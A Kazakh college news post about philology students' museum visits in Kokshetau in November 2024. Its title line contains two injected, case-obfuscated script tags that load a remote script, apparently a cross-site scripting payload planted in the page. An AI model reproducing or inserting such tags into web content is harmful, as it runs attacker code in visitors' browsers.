БІРТҰТАС ТӘРБИЕ БАҒДАРЛАМАСЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.11.2024
2024 жылдың 13 қарашасында Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің филология бөлімінің 1 курс студенттерінен құралған ФБ-11, ФБ-12, ФБ-22 ҚБ топтары Ақмола облысы мәдениет басқармасының «Әдебиет және өнер мұражайы» МКМ мен Ақмола облыстық тарихи-өлкетану мұражайына барып келді. «Әдебиет және өнер» мұражайы 1993 жылдың 22-шiлдесiнен бастап көпшiлiктiң мәдени-рухани игiлiгiне қызмет жасап келедi. Аталмыш мұражайда студенттер Көкшетау-Ақмола өңiрi тумаларын ғана емес, елiмiзге танымал басқа да ақын-жазушылардың, сал-серiлердiң, өнер-қайраткерлерiнiң өмiр мен шығармашылығымен танысты. Сондай-ақ, Ақмола облыстық тарихи-өлкетану мұражайында өлкенің тарихы, археологиясы, этнографиясы, табиғаты және мәдениеті бойынша ақпарат алды. Студенттер өздерін толғандырған сұрақтарын қоя отырып, пікір алмасты.
Просмотров: 462